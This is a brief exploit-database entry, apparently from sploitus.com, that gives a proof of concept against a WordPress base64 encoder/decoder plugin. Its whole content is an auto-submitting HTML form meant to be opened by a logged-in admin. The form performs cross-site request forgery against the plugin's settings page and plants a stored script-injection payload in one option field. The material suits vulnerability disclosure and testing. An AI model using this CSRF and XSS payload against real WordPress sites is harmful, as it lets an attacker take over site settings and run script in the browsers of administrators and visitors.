Share
## https://sploitus.com/exploit?id=WPEX-ID:A138215C-4B8C-4182-978F-D21CE25070D3
Make a logged in admin open an HTML file containing the following:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=base64-encoderdecoder%2fbase64-encoderdecoder.php" method="post">
        <input type="text" name="b64_button_text" value="csrf">
        <input type="text" name="b64_wordwrap" value='"><script>alert(999)</script>'>
        <input type="text" name="b64_format" value="bq">
        <input name="update" value="1">
        <input type="submit" name="enter" value="submit">
</body>
```